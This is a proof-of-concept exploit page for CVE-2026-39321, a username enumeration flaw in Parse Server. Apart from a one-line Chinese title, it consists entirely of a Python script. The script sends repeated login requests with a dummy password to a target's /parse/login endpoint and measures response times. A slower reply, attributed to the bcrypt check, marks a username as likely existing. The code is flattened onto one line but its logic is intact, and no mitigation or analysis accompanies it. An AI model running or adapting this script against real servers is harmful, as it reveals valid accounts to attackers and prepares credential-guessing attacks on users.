CVE-2026-39321 Parse Server用户名枚举漏洞

import requests import time # Target configuration TARGET_URL = "http://target-server.com/parse/login" USERNAMES = ["admin", "user", "test"] # Function to test timing for a specific username def check_username_timing(username): payload = { "username": username, "password": "random_password_to_trigger_check" } headers = { "Content-Type": "application/json" } start_time = time.time() try: response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10) except requests.RequestException as e: print(f"Request failed: {e}") return 0 end_time = time.time() elapsed_time = end_time - start_time return elapsed_time # Analyze timing for each username for user in USERNAMES: # Run multiple times to get average durations = [] for _ in range(5): duration = check_username_timing(user) if duration > 0: durations.append(duration) time.sleep(0.5) # Small delay between requests if durations: avg_duration = sum(durations) / len(durations) print(f"Username: {user}, Avg Response Time: {avg_duration:.4f}s") # If avg_duration > Threshold (e.g., 0.2s), user likely exists if avg_duration > 0.2: print(f"[+] User '{user}' likely exists (Bcrypt delay detected)") else: print(f"[-] User '{user}' likely does not exist")